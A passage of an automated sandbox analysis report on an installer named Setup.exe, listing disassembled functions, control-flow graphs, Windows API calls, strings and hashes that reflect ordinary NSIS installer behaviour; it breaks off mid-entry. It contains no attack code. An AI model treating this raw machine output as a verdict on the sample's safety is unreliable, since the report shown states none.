                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleLibraryLoadModuleProc
                                                                  • String ID:
                                                                  • API String ID: 310444273-0
                                                                  • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                  • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                  • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                  • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC
                                                                  Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 56 4015a0-4015f4 57 4030e3-4030ec 56->57 58 4015fa 56->58 86 4030ee-4030f2 57->86 60 401601-401611 call 4062cf 58->60 61 401742-40174f 58->61 62 401962-40197d call 40145c GetFullPathNameW 58->62 63 4019ca-4019e6 call 40145c SearchPathW 58->63 64 40176e-401794 call 40145c call 4062cf SetFileAttributesW 58->64 65 401650-40166d call 40137e call 4062cf call 40139d 58->65 66 4017b1-4017d8 call 40145c call 4062cf call 405d85 58->66 67 401672-401686 call 40145c call 4062cf 58->67 68 401693-4016ac call 401446 call 4062cf 58->68 69 401715-401731 58->69 70 401616-40162d call 40145c call 4062cf call 404f9e 58->70 71 4016d6-4016db 58->71 72 401736-40173d 58->72 73 401897-4018a7 call 40145c call 406301 58->73 74 4018db-401910 call 40145c * 3 call 4062cf MoveFileW 58->74 75 40163c-401645 58->75 76 4016bd-4016d1 call 4062cf SetForegroundWindow 58->76 60->86 77 401751-401755 ShowWindow 61->77 78 401758-40175f 61->78 117 4019a3-4019a8 62->117 118 40197f-401984 62->118 63->57 123 4019ec-4019f8 63->123 64->57 136 40179a-4017a6 call 4062cf 64->136 65->86 160 401864-40186c 66->160 161 4017de-4017fc call 405d32 CreateDirectoryW 66->161 137 401689-40168e call 404f9e 67->137 142 4016b1-4016b8 Sleep 68->142 143 4016ae-4016b0 68->143 69->86 94 401632-401637 70->94 92 401702-401710 71->92 93 4016dd-4016fd call 401446 71->93 96 4030dd-4030de 72->96 138 4018c2-4018d6 call 4062cf 73->138 139 4018a9-4018bd call 4062cf 73->139 172 401912-401919 74->172 173 40191e-401921 74->173 75->94 95 401647-40164e PostQuitMessage 75->95 76->57 77->78 78->57 99 401765-401769 ShowWindow 78->99 92->57 93->57 94->86 95->94 96->57 113 4030de call 405f7d 96->113 99->57 113->57 130 4019af-4019b2 117->130 129 401986-401989 118->129 118->130 123->57 123->96 129->130 140 40198b-401993 call 406301 129->140 130->57 144 4019b8-4019c5 GetShortPathNameW 130->144 155 4017ab-4017ac 136->155 137->57 138->86 139->86 140->117 165 401995-4019a1 call 406035 140->165 142->57 143->142 144->57 155->57 163 401890-401892 160->163 164 40186e-40188b call 404f9e call 406035 SetCurrentDirectoryW 160->164 176 401846-40184e call 4062cf 161->176 177 4017fe-401809 GetLastError 161->177 163->137 164->57 165->130 172->137 178 401923-40192b call 406301 173->178 179 40194a-401950 173->179 192 401853-401854 176->192 182 401827-401832 GetFileAttributesW 177->182 183 40180b-401825 GetLastError call 4062cf 177->183 178->179 193 40192d-401948 call 406c94 call 404f9e 178->193 181 401957-40195d call 4062cf 179->181 181->155 190 401834-401844 call 4062cf 182->190 191 401855-40185e 182->191 183->191 190->192 191->160 191->161 192->191 193->181
                                                                  APIs
                                                                  • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                  • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                  • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                  • ShowWindow.USER32(?), ref: 00401753
                                                                  • ShowWindow.USER32(?), ref: 00401767
                                                                  • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                  • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                  • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                  • SetCurrentDirectoryW.KERNELBASE(?,004D70B0,?,000000E6,004100F0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                  • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                  • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,004100F0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                  • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                  • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                  Strings
                                                                  • Rename: %s, xrefs: 004018F8
                                                                  • BringToFront, xrefs: 004016BD
                                                                  • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                  • Rename on reboot: %s, xrefs: 00401943
                                                                  • Call: %d, xrefs: 0040165A
                                                                  • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                  • SetFileAttributes failed., xrefs: 004017A1
                                                                  • Sleep(%d), xrefs: 0040169D
                                                                  • Rename failed: %s, xrefs: 0040194B
                                                                  • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                  • detailprint: %s, xrefs: 00401679
                                                                  • Aborting: "%s", xrefs: 0040161D
                                                                  • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                  • Jump: %d, xrefs: 00401602
                                                                  • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                  • CreateDirectory: "%s" created, xrefs: 00401849
                                                                  • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                  • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                  • API String ID: 2872004960-3619442763
                                                                  • Opcode ID: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                  • Instruction ID: d546d874ac51cf0a7c72b7d7aee7a5a926bf82a1b22bfeef9e4f81a1fba4758f
                                                                  • Opcode Fuzzy Hash: cb44afc3f00204bc7321e8aa54be61598e0149da34aa070ef9c2be04eb5c6a73
                                                                  • Instruction Fuzzy Hash: 9EB1F435A00214ABDB10BFA1DD55DAE3F69EF44324B21817FF806B61E2DA3D4E40C66D
                                                                  Function 004054A5 Relevance: 48.3, APIs: 32, Instructions: 345windowstringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 323 4054a5-4054b7 324 4055f9-405608 323->324 325 4054bd-4054c3 323->325 327 405657-40566c 324->327 328 40560a-405652 GetDlgItem * 2 call 403d6b SetClassLongW call 40141d 324->328 325->324 326 4054c9-4054d2 325->326 331 4054d4-4054e1 SetWindowPos 326->331 332 4054e7-4054ea 326->332 329 4056ac-4056b1 call 403ddb 327->329 330 40566e-405671 327->330 328->327 342 4056b6-4056d1 329->342 334 405673-40567e call 40139d 330->334 335 4056a4-4056a6 330->335 331->332 337 405504-40550a 332->337 338 4054ec-4054fe ShowWindow 332->338 334->335 356 405680-40569f SendMessageW 334->356 335->329 341 40594c 335->341 343 405526-405529 337->343 344 40550c-405521 DestroyWindow 337->344 338->337 351 40594e-405955 341->351 349 4056d3-4056d5 call 40141d 342->349 350 4056da-4056e0 342->350 346 40552b-405537 SetWindowLongW 343->346 347 40553c-405542 343->347 352 405929-40592f 344->352 346->351 354 4055e5-4055f4 call 403df6 347->354 355 405548-405559 GetDlgItem 347->355 349->350 359 4056e6-4056f1 350->359 360 40590a-405923 DestroyWindow KiUserCallbackDispatcher 350->360 352->341 357 405931-405937 352->357 354->351 361 405578-40557b 355->361 362 40555b-405572 SendMessageW IsWindowEnabled 355->362 356->351 357->341 364 405939-405942 ShowWindow 357->364 359->360 365 4056f7-405744 call 406831 call 403d6b * 3 GetDlgItem 359->365 360->352 366 405580-405583 361->366 367 40557d-40557e 361->367 362->341 362->361 364->341 393 405746-40574c 365->393 394 40574f-40578b ShowWindow KiUserCallbackDispatcher call 403db1 EnableWindow 365->394 372 405591-405596 366->372 373 405585-40558b 366->373 371 4055ae-4055b3 call 403d44 367->371 371->354 376 4055cc-4055df SendMessageW 372->376 378 405598-40559e 372->378 373->376 377 40558d-40558f 373->377 376->354 377->371 381 4055a0-4055a6 call 40141d 378->381 382 4055b5-4055be call 40141d 378->382 391 4055ac 381->391 382->354 390 4055c0-4055ca 382->390 390->391 391->371 393->394 397 405790 394->397 398 40578d-40578e 394->398 399 405792-4057c0 GetSystemMenu EnableMenuItem SendMessageW 397->399 398->399 400 4057c2-4057d3 SendMessageW 399->400 401 4057d5 399->401 402 4057db-405819 call 403dc4 call 406035 lstrlenW call 406831 SetWindowTextW call 40139d 400->402 401->402 402->342 411 40581f-405821 402->411 411->342 412 405827-40582b 411->412 413 40584a-40585e DestroyWindow 412->413 414 40582d-405833 412->414 413->352 416 405864-405891 CreateDialogParamW 413->416 414->341 415 405839-40583f 414->415 415->342 418 405845 415->418 416->352 417 405897-4058ee call 403d6b GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 416->417 417->341 423 4058f0-405903 ShowWindow call 403ddb 417->423 418->341 425 405908 423->425 425->352
                                                                  APIs
                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054E1
                                                                  • ShowWindow.USER32(?), ref: 004054FE
                                                                  • DestroyWindow.USER32 ref: 00405512
                                                                  • SetWindowLongW.USER32(?,00000000,00000000), ref: 0040552E
                                                                  • GetDlgItem.USER32(?,?), ref: 0040554F
                                                                  • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405563
                                                                  • IsWindowEnabled.USER32(00000000), ref: 0040556A
                                                                  • GetDlgItem.USER32(?,00000001), ref: 00405619
                                                                  • GetDlgItem.USER32(?,00000002), ref: 00405623
                                                                  • SetClassLongW.USER32(?,000000F2,?), ref: 0040563D
                                                                  • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040568E
                                                                  • GetDlgItem.USER32(?,00000003), ref: 00405734
                                                                  • ShowWindow.USER32(00000000,?), ref: 00405756
                                                                  • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00405768
                                                                  • EnableWindow.USER32(?,?), ref: 00405783
                                                                  • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00405799
                                                                  • EnableMenuItem.USER32(00000000), ref: 004057A0
                                                                  • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004057B8
                                                                  • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004057CB
                                                                  • lstrlenW.KERNEL32(00451D98,?,00451D98,00476AA0), ref: 004057F4
                                                                  • SetWindowTextW.USER32(?,00451D98), ref: 00405808
                                                                  • ShowWindow.USER32(?,0000000A), ref: 0040593C
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                  • String ID:
                                                                  • API String ID: 3282139019-0
                                                                  • Opcode ID: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                  • Instruction ID: f960999a9681c69a960cfafceaa395f4ab6c0ab2fcbff8166cb7657a87eea2d0
                                                                  • Opcode Fuzzy Hash: 368de82205cbc4940732e302d2e847697efd4030890e1d8fceca6bf2533b68ed
                                                                  • Instruction Fuzzy Hash: 13C189B1500A04FBDB216F61ED89E2B7BA9EB49715F00093EF506B11F1C6399881DF2E
                                                                  Function 00405958 Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 426 405958-405970 call 406328 429 405972-405982 call 405f7d 426->429 430 405984-4059bc call 405eff 426->430 439 4059df-405a08 call 403ec1 call 4067aa 429->439 435 4059d4-4059da lstrcatW 430->435 436 4059be-4059cf call 405eff 430->436 435->439 436->435 444 405a9c-405aa4 call 4067aa 439->444 445 405a0e-405a13 439->445 451 405ab2-405ab9 444->451 452 405aa6-405aad call 406831 444->452 445->444 447 405a19-405a41 call 405eff 445->447 447->444 453 405a43-405a47 447->453 455 405ad2-405af7 LoadImageW 451->455 456 405abb-405ac1 451->456 452->451 457 405a49-405a58 call 405d32 453->457 458 405a5b-405a67 lstrlenW 453->458 460 405b92-405b9a call 40141d 455->460 461 405afd-405b3f RegisterClassW 455->461 456->455 459 405ac3-405ac8 call 403ea0 456->459 457->458 463 405a69-405a77 lstrcmpiW 458->463 464 405a8f-405a97 call 40674e call 406035 458->464 459->455 475 405ba4-405baf call 403ec1 460->475 476 405b9c-405b9f 460->476 466 405c61 461->466 467 405b45-405b8d SystemParametersInfoW CreateWindowExW 461->467 463->464 471 405a79-405a83 GetFileAttributesW 463->471 464->444 470 405c63-405c6a 466->470 467->460 477 405a85-405a87 471->477 478 405a89-405a8a call 40677d 471->478 484 405bb5-405bd2 ShowWindow LoadLibraryW 475->484 485 405c38-405c39 call 405073 475->485 476->470 477->464 477->478 478->464 486 405bd4-405bd9 LoadLibraryW 484->486 487 405bdb-405bed GetClassInfoW 484->487 491 405c3e-405c40 485->491 486->487 489 405c05-405c28 DialogBoxParamW call 40141d 487->489 490 405bef-405bff GetClassInfoW RegisterClassW 487->490 497 405c2d-405c36 call 403c94 489->497 490->489 492 405c42-405c48 491->492 493 405c5a-405c5c call 40141d 491->493 492->476 495 405c4e-405c55 call 40141d 492->495 493->466 495->476 497->470
                                                                  APIs
                                                                    • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                    • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                    • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                  • lstrcatW.KERNEL32(004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0,-00000002,00000000,004E30C8,00403AED,?), ref: 004059DA
                                                                  • lstrlenW.KERNEL32(0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006,004CF0A0), ref: 00405A5C
                                                                  • lstrcmpiW.KERNEL32(0046E218,.exe,0046E220,?,?,?,0046E220,00000000,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000), ref: 00405A6F
                                                                  • GetFileAttributesW.KERNEL32(0046E220), ref: 00405A7A
                                                                    • Part of subcall function 00405F7D: wsprintfW.USER32 ref: 00405F8A
                                                                  • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004D30A8), ref: 00405AE3
                                                                  • RegisterClassW.USER32(00476A40), ref: 00405B36
                                                                  • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B4E
                                                                  • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B87
                                                                    • Part of subcall function 00403EC1: SetWindowTextW.USER32(00000000,00476AA0), ref: 00403F5C
                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00405BBD
                                                                  • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BCE
                                                                  • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BD9
                                                                  • GetClassInfoW.USER32(00000000,RichEdit20A,00476A40), ref: 00405BE9
                                                                  • GetClassInfoW.USER32(00000000,RichEdit,00476A40), ref: 00405BF6
                                                                  • RegisterClassW.USER32(00476A40), ref: 00405BFF
                                                                  • DialogBoxParamW.USER32(?,00000000,004054A5,00000000), ref: 00405C1E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                  • String ID: F$"F$.DEFAULT\Control Panel\International$.exe$@jG$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                  • API String ID: 608394941-2746725676
                                                                  • Opcode ID: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                  • Instruction ID: c846f8899feab6000a015ad3d9ba4b80e1385b5ee8e185a3118195eaaf4def2f
                                                                  • Opcode Fuzzy Hash: ff750bfe5142f8154025b48725ed66ec952ceebe161b5cb34577f361fd6f9efb
                                                                  • Instruction Fuzzy Hash: 53719175600705AEE710AB65AD89E2B37ACEB44718F00453FF906B62E2D778AC41CF6D
                                                                  Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                    • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                  • lstrcatW.KERNEL32(00000000,00000000,CanPoland,004D70B0,00000000,00000000), ref: 00401A76
                                                                  • CompareFileTime.KERNEL32(-00000014,?,CanPoland,CanPoland,00000000,00000000,CanPoland,004D70B0,00000000,00000000), ref: 00401AA0
                                                                    • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,759223A0,00000000), ref: 00404FD6
                                                                    • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FE6
                                                                    • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,759223A0,00000000), ref: 00404FF9
                                                                    • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                    • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                  • String ID: CanPoland$File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"
                                                                  • API String ID: 4286501637-3376295515
                                                                  • Opcode ID: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                  • Instruction ID: 90fa90950dbbf035c4f81507b49f49b55cd41b97b653845b504dd01eb698d819
                                                                  • Opcode Fuzzy Hash: e66e3e702844fd7f079e7b10ae6de895f6d273da0ae026ac64afba16485083bb
                                                                  • Instruction Fuzzy Hash: 8B512931901214BADB10BBB5CC46EEE3979EF05378B20423FF416B11E2DB3C9A518A6D
                                                                  Function 004035B3 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 587 4035b3-403601 GetTickCount GetModuleFileNameW call 405e7c 590 403603-403608 587->590 591 40360d-40363b call 406035 call 40677d call 406035 GetFileSize 587->591 592 4037e2-4037e6 590->592 599 403641 591->599 600 403728-403736 call 4032d2 591->600 602 403646-40365d 599->602 606 4037f1-4037f6 600->606 607 40373c-40373f 600->607 604 403661-403663 call 403336 602->604 605 40365f 602->605 611 403668-40366a 604->611 605->604 606->592 609 403741-403759 call 403368 call 403336 607->609 610 40376b-403795 GlobalAlloc call 403368 call 40337f 607->610 609->606 638 40375f-403765 609->638 610->606 636 403797-4037a8 610->636 614 403670-403677 611->614 615 4037e9-4037f0 call 4032d2 611->615 616 4036f3-4036f7 614->616 617 403679-40368d call 405e38 614->617 615->606 623 403701-403707 616->623 624 4036f9-403700 call 4032d2 616->624 617->623 634 40368f-403696 617->634 627 403716-403720 623->627 628 403709-403713 call 4072ad 623->628 624->623 627->602 635 403726 627->635 628->627 634->623 640 403698-40369f 634->640 635->600 641 4037b0-4037b3 636->641 642 4037aa 636->642 638->606 638->610 640->623 643 4036a1-4036a8 640->643 644 4037b6-4037be 641->644 642->641 643->623 645 4036aa-4036b1 643->645 644->644 646 4037c0-4037db SetFilePointer call 405e38 644->646 645->623 647 4036b3-4036d3 645->647 650 4037e0 646->650 647->606 649 4036d9-4036dd 647->649 651 4036e5-4036ed 649->651 652 4036df-4036e3 649->652 650->592 651->623 653 4036ef-4036f1 651->653 652->635 652->651 653->623
                                                                  APIs
                                                                  • GetTickCount.KERNEL32 ref: 004035C4
                                                                  • GetModuleFileNameW.KERNEL32(00000000,004EB0D8,00002004,?,?,?,00000000,00403A73,?), ref: 004035E0
                                                                    • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                    • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                  • GetFileSize.KERNEL32(00000000,00000000,004EF0E0,00000000,004DB0B8,004DB0B8,004EB0D8,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 0040362C
                                                                  Strings
                                                                  • Null, xrefs: 004036AA
                                                                  • soft, xrefs: 004036A1
                                                                  • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037F1
                                                                  • Inst, xrefs: 00403698
                                                                  • Error launching installer, xrefs: 00403603
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2082752103.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2082726570.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082766792.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2082782926.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2083121101.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_Setup.jbxd
                                                                  Similarity
                                                                  • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                  • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                  • API String ID: 4283519449-527102705
                                                                  • Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
